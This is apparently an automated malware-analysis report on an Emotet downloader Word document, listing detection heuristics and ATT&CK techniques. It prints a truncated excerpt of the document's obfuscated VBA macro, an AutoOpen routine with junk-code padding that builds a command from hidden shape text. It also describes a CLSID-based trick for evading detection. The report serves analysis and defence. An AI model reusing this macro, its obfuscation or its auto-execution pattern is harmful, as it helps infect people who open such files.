Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample was detected as malicious by ClamAV with the signature Doc.Downloader.Emotet-6826435-0. Critical heuristics indicate the presence of VBA macros that instantiate the dangerous COM class WScript.Shell, a common technique for executing downloaded payloads. The AutoOpen macro is present, suggesting immediate execution upon opening the document. The obfuscated document body content appears to be a PowerShell downloader script.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-6826435-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6826435-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical) [OLE_VBA_GETOBJECT_CLSID_DANGEROUS]: VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7850 bytes |

SHA-256: 198ff1a7f3183d00545b507d062ba9b64c7272f6b3483c932ebbf994021f60f0
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "PfAGmOG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    On Error Resume Next
    Select Case BjBzh
        Case 60615032
            PvkarRTl = CBool(OzBVak)
            tDKszJVdC = 100082315
        Case 302068318
            XiYccA = Atn(zSSjOZlIU)
            oYjRmIw = Atn(147723858 * CLng(108045589))
    End Select
    For Each FaHXcXAO In qXZVakcb
        wSLBBFN = KBlZbGLNu * CDate(LuDqZWW * zPDIjKh) * azaEYBK / Sin(NwdMORNH) / LRjTFtof + 155451724 - 37270305 + Chr(326839218) + (BVbsBfOn * AJkSdatJ)
    Next
    On Error Resume Next
    Select Case BdVVBic
        Case 151480484
            OvRjPLT = CBool(jhjFh)
            ZiFvJdGn = 107893051
        Case 78023260
            NBGFiI = Atn(JGwEXHMj)
            UjKoQ = Atn(132611570 * CLng(303976777))
    End Select
    For Each rviStUafF In CKMwFY
        wamUGwjaZ = HGXzsHJO * CDate(aQPmVZSo * YrYal) * UtHbkwzsU / Sin(TZhVJDCh) / whhoRvn + 70417550 - 162543568 + Chr(10264865) + (NjUjdzzi * maXvEBA)
    Next
    Set CvcUsAGV = Shapes("qAUosho")
    On Error Resume Next
    Select Case aOcztUKwJ
        Case 56016464
            poPvnb = CBool(jiDOm)
            MfSXr = 240462018
        Case 300944904
            KzFiTPSW = Atn(WzGlsG)
            dVKaZEuM = Atn(186179359 * CLng(151877692))
    End Select
    For Each OBmEYOWf In KMTMrKQhO
        UUYnuVaT = GDsGwd * CDate(UfRbr * MQUQBz) * OnMwwCRp / Sin(siwvHZ) / SGXjnqkP + 256991484 - 263095075 + Chr(34694560) + (ISdUc * zSqtKtLO)
    Next
    On Error Resume Next
    Select Case lJlDFtl
        Case 276439708
            sYRHn = CBool(TbSboSa)
            uZhKVD = 210624892
        Case 43922874
            qQmqzoo = Atn(YLMHoF)
            iTXNjV = Atn(100805669 * CLng(57056009))
    End Select
    For Each wriXjQ In XlwaqAmW
        dJQGOEFT = fBjSXEb * CDate(brGJR * IZoVqiVi) * AaFLwCzu / Sin(LBDOFFOt) / jYuQiMbIj + 168658881 - 231804082 + Chr(100111578) + (ABUfrRtc * izUzP)
    Next
    PBphCt = "" + jvOOV + dwHndCK + vYDzLI + GvYwd + CvcUsAGV.TextFrame.TextRange.Text + BwBhKYU + kzjKrz + QTpNobP + zjhiOBq
    On Error Resume Next
    Select Case aaTti
        Case 33912553
            nuwEEwDOt = CBool(YUFzfqNU)
            qqtRBim = 237970973
        Case 299508520
            dQlwcOWVr = Atn(pMjipaN)
            MvjGZKOI = Atn(303791183 * CLng(190103852))
    End Select
    For Each VRLKQQTmX In jJVVpii
        PcbUD = wOWqahU * CDate(taVNdC * NVnqGd) * OkkckwiA / Sin(BOoLBt) / LpHPPuA + 181166776 - 34339666 + Chr(184662158) + (CGndwuMAm * wzWpt)
    Next
    On Error Resume Next
    Select Case wRZBipOww
        Case 129604512
            kvVhuf = CBool(qULqlq)
            nEcRGmhpi = 120077165
        Case 166332984
            qITFCB = Atn(lClkMRjwa)
            mGjjLqkmj = Atn(293160600 * CLng(216917033))
    End Select
    For Each vRDIjpEX In IorEnB
        PAZqGz = LsbiRiTVI * CDate(CHUjDi * sDbdRpiXo) * WjSqcw / Sin(rPHKmov) / fdCjhoLR + 232599555 - 328349600 + Chr(16930173) + (OuDzHcS * oqWZLuoob)
    Next
    On Error Resume Next
    Select Case mkrcRbvtj
        Case 282016637
            DzWUcnYfA = CBool(jmpSoooi)
            ZidciC = 55021785
        Case 308905229
            bwtLhKp = Atn(sBOwAbc)
            FzBJcn = Atn(50183106 * CLng(97991111))
    End Select
    For Each ROZWoR In szDEtV
        fdSvn = PYGAQc * CDate(Hlwoo * tQvPzEj) * GAXYTktVf / Sin(rUwDs) / YGLNM + 46504646 - 23177517 + Chr(98868470) + (PbnjOS * EWJYjcwrL)
    Next
    On Error Resume Next
    Select Case NjFwKBCF
        Case 301711016
            jlFtiaJKj = CBool(LwvPDr)
            wRzlUCk = 170421436
        Case 186570219
            hZvJakn = Atn(NJZGEi)
            kJURl = Atn(274684494 * CLng(310447291))
    End Select
    For Each WEnwEP In UTGDbloB
        LHDphFrM = cjsPIq * CDate(mFYFmojz * oGABCXw) * jGdmF / Sin(RMbdbfrF) / PWpfPv + 336441552 - 150723544 + Chr(161004475) + (LszqL * FnjjCN)
    Next
    On Error Resume Next
    Se
```

... (truncated)